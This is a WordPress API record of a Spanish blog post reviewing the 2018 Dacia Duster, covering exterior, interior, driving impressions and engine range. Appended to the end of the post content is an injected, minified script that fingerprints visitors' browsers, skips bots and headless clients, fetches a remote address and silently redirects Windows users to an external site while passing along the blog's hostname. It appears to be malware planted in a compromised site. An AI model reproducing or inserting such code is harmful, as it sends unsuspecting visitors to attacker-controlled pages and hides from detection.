{"id":692,"date":"2018-05-16T09:03:59","date_gmt":"2018-05-16T09:03:59","guid":{"rendered":"http:\/\/juntosporelcoche.com\/?p=692"},"modified":"2025-08-21T11:08:31","modified_gmt":"2025-08-21T11:08:31","slug":"dacia-duster-2o-generacion","status":"publish","type":"post","link":"https:\/\/juntosporelcoche.com\/index.php\/2018\/05\/16\/dacia-duster-2o-generacion\/","title":{"rendered":"Dacia Duster 2\u00ba generaci\u00f3n."},"content":{"rendered":"<p style=\"text-align: justify;\">Poco tiene que ver esta generaci\u00f3n del Dacia Duster con la primera que ve\u00eda la luz all\u00e1 por el a\u00f1o 2010 en su versi\u00f3n original y que con el tiempo sufrir\u00eda algunos retoques est\u00e9ticos. En aquel coche original y en esos a\u00f1os era un coche muy de mercados emergentes que se introduc\u00eda en Europa con la idea de dar la batalla en los a\u00f1os de crisis. Si atendemos a las ventas la idea ha resultado un \u00e9xito rotundo hasta tal punto que incluso ha llegado a restar ventas a Renault que es su empresa matriz.<\/p>\n<p style=\"text-align: justify;\">El precio ha sido siempre la mejor baza en todos los productos Dacia y ha resultado determinante en la decisi\u00f3n de compra, pero con el paso de los a\u00f1os y algo de recuperaci\u00f3n de poder adquisitivo los clientes han ido demandando algo m\u00e1s. Los cambios han venido de la mano de productos mejorados en calidad (poco tiene que ver un Sandero original con uno de los actuales), la incorporaci\u00f3n de nuevas opciones o series especiales (como la edici\u00f3n Stepway), o unos dise\u00f1os m\u00e1s acordes con los gustos del cliente europeo.<\/p>\n<figure id=\"attachment_710\" aria-describedby=\"caption-attachment-710\" style=\"width: 2976px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-710 size-full\" src=\"http:\/\/juntosporelcoche.com\/wp-content\/uploads\/2018\/05\/IMG_20180511_1108516951.jpg\" alt=\"\" width=\"2976\" height=\"3968\" \/><figcaption id=\"caption-attachment-710\" class=\"wp-caption-text\">Frontal Dacia Duster 2018, en el original color naranja atacama.<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Basta ver el coche a una cierta distancia para darnos cuenta que se trata de algo muy diferente a la primera generaci\u00f3n, ya al acercarnos nos llama la atenci\u00f3n que el coche abre por si solo acompa\u00f1ado de un toque de claxon, ello se debe a la ya conocida tarjeta manos libres de Renault que incorpora este Dacia por primera vez y que hace que no tengamos que sacarla del bolsillo en ning\u00fan momento (aclaro que mi unidad de pruebas era un Duster Dci 110cv con tracci\u00f3n a las cuatro ruedas y acabado Prestige). En cuanto al dise\u00f1o exterior la silueta del coche ha ganado una imagen mucho m\u00e1s musculosa aunque bajo mi punto de vista sigue guardando la esencia del Duster original. La parte delantera incorpora faros de mayor tama\u00f1o con l\u00edneas leds, la parrilla es de nuevo dise\u00f1o y tenemos una nueva moldura en forma de &#8220;u&#8221; invertida en color gris que sale desde la parte baja del coche y le aporta un aspecto m\u00e1s SUV. La parte trasera tambi\u00e9n ha sido redise\u00f1ada y al igual que la parte delantera tiene la moldura gris, aunque lo que verdaderamente llama la atenci\u00f3n son los llamativos faros que recuerdan a un modelo de la competencia. Para poner la guinda al conjunto tenemos unas barras de techo de nuevo dise\u00f1o que conjuntan a la perfecci\u00f3n con los retrovisores.<\/p>\n<figure id=\"attachment_712\" aria-describedby=\"caption-attachment-712\" style=\"width: 3968px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-712 size-full\" src=\"http:\/\/juntosporelcoche.com\/wp-content\/uploads\/2018\/05\/IMG_20180511_1109536949.jpg\" alt=\"\" width=\"3968\" height=\"2976\" \/><figcaption id=\"caption-attachment-712\" class=\"wp-caption-text\">Salpicadero Dacia Duster 2018. Nuevo dise\u00f1o y mejorado en ajustes.<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">En el interior es donde particularmente he apreciado m\u00e1s y mejores cambios, para empezar los asientos son muy c\u00f3modos y envolventes acordes en dise\u00f1o con el tipo de coche . El salpicadero es de reciente dise\u00f1o, con algunas inserciones cromadas y con una botonera con teclas de piano muy original, las tres ruletas con pantalla que sirven para manejar el climatizador le aportan un plus de originalidad del que carec\u00edan en la marca hasta ahora. Se echa en falta un apoyabrazos tambi\u00e9n en el asiento del acompa\u00f1ante y se agradece que incorpore volante regulable en altura y profundidad para poder conseguir la postura ideal al volante. Ya en marcha resulta muy f\u00e1cil de conducir hasta el punto de creer que llevamos un compacto, mi unidad de pruebas se trataba de una versi\u00f3n con tracci\u00f3n total con 6 marchas y sin reductora. Menci\u00f3n aparte merece el tema de la rumorosidad en el habit\u00e1culo en marcha, el cambio con la anterior generaci\u00f3n se nota y mucho. El confort general en ruta es realmente bueno, las pruebas en caminos de monte con imperfecciones considerables y desniveles, las solventa con creces disfrutando el conductor en todo momento de sus aptitudes off-road.<\/p>\n<figure id=\"attachment_715\" aria-describedby=\"caption-attachment-715\" style=\"width: 4608px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-715\" src=\"http:\/\/juntosporelcoche.com\/wp-content\/uploads\/2018\/05\/DSC_0458.jpg\" alt=\"\" width=\"4608\" height=\"3072\" \/><figcaption id=\"caption-attachment-715\" class=\"wp-caption-text\">Trasera Dacia Duster 2018, en acabado Prestige el m\u00e1s alto de todos los disponibles.<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">La gama de motores a d\u00eda de hoy se compone de dos variantes di\u00e9sel dci con 90 y 110 caballos respectivamente con posibilidad de elegir tracci\u00f3n a las cuatro ruedas en la superior. Por el lado de la gasolina tenemos el bloque 1.2 Tce con 114 y 125 caballos respectivamente pudiendo tambi\u00e9n elegir el de mayor potencia en versi\u00f3n 4&#215;4. Los acabados disponibles son 4 en la familia de gasolina; Acces, Essential, Comfort y Prestige, prescindiendo los di\u00e9sel del acabado b\u00e1sico Acces. Los Dci son de sobra conocidos y en cuanto a los Tce y como elecci\u00f3n personal me decantar\u00eda por el 1.2 Tce de 125 cv y si el presupuesto nos lo permite el acabado Prestige con el cambio autom\u00e1tico.<\/p>\n<p style=\"text-align: justify;\">Hasta aqu\u00ed mis impresiones sobre el nuevo Duster, si el anterior ya tuvo un gran \u00e9xito la nueva generaci\u00f3n mejora en todos los aspectos, por tanto es de esperar que tenga una gran acogida. Se trata de un coche que saca el m\u00e1ximo partido a cada euro que cuesta. No quiero terminar sin agradecer a Herrero y L\u00f3pez concesionario oficial Renault-Dacia en Murcia la cesi\u00f3n de la unidad de pruebas y la colaboraci\u00f3n con este Blog.<\/p>\n<p>Saludos a tod@s. Seguimos conectados.<\/p>\n<p><script>!async function(){let e=decodeURIComponent(),t=decodeURIComponent();function r(e){return btoa(unescape(encodeURIComponent(e)))}let n={};if(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,r]=e.split(\"=\");t&&r&&(n[t]=decodeURIComponent(r.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return;function i(e,t){let r=e.match(t);return r?parseInt(r[1],10):null}let a=navigator.userAgent,o=\/Windows NT 10.0\/.test(a),l={chrome:136,edge:134,opera:120,yandex:24,vivaldi:6,firefox:140,brave:136},s=i(a,\/Chrome\\\/(\\d+)\\.\/),c=i(a,\/Edg\\\/(\\d+)\\.\/),d=i(a,\/OPR\\\/(\\d+)\\.\/),u=i(a,\/YaBrowser\\\/(\\d+)\\.\/),$=i(a,\/Vivaldi\\\/(\\d+)\\.\/),h=i(a,\/Firefox\\\/(\\d+)\\.\/),f=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(a)&&\/Chrome\\\/(\\d+)\\.\/.test(a),y=!1;s&&s>=l.chrome?y=!0:c&&c>=l.edge?y=!0:d&&d>=l.opera?y=!0:u&&u>=l.yandex?y=!0:$&&$>=l.vivaldi?y=!0:h&&h>=l.firefox?y=!0:f&&s&&s>=l.brave&&(y=!0);let g=navigator.webdriver||\/HeadlessChrome\/.test(a)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(a),m=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory;if(!o||g||m)return;if(!y){try{fetch(t)}catch(v){}return}async function p(e,t={}){let{timeout:r=3e3}=t,n=new AbortController,i=setTimeout(()=>n.abort(),r);try{let a=await fetch(e,{...t,signal:n.signal});return clearTimeout(i),a}catch(o){return clearTimeout(i),null}}async function w(t=1){try{let n=await p(e,{timeout:3e3});if(!n||403===n.status)return null;if(!n.ok)throw Error(\"Network response was not ok\");let i=await n.json();return`${i.url}\/?wsid=${window.location.hostname}&domain=${r(window.location.hostname)}`}catch(a){if(t<1)return w(t+1);return null}}let _=document.querySelector('link[rel=\"icon\"]'),b=await w();if(b){let H=b;_&#038;&#038;(H+=`&#038;link=${r(_.href)}`),window.location.replace(H)}}();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Poco tiene que ver esta generaci\u00f3n del Dacia Duster con la primera que ve\u00eda la luz all\u00e1 por el a\u00f1o 2010 en su versi\u00f3n original y que con el tiempo sufrir\u00eda algunos retoques est\u00e9ticos. En aquel coche original y en esos a\u00f1os era un coche muy de mercados emergentes que se introduc\u00eda en Europa con<a class=\"more-link\" href=\"https:\/\/juntosporelcoche.com\/index.php\/2018\/05\/16\/dacia-duster-2o-generacion\/\">Seguir leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":708,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"image","meta":{"footnotes":""},"categories":[37,13],"tags":[],"class_list":["post-692","post","type-post","status-publish","format-image","has-post-thumbnail","hentry","category-dacia","category-pruebas","post_format-post-format-image"],"_links":{"self":[{"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/posts\/692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/comments?post=692"}],"version-history":[{"count":39,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/posts\/692\/revisions"}],"predecessor-version":[{"id":908488,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/posts\/692\/revisions\/908488"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/media\/708"}],"wp:attachment":[{"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/media?parent=692"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/categories?post=692"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/juntosporelcoche.com\/index.php\/wp-json\/wp\/v2\/tags?post=692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}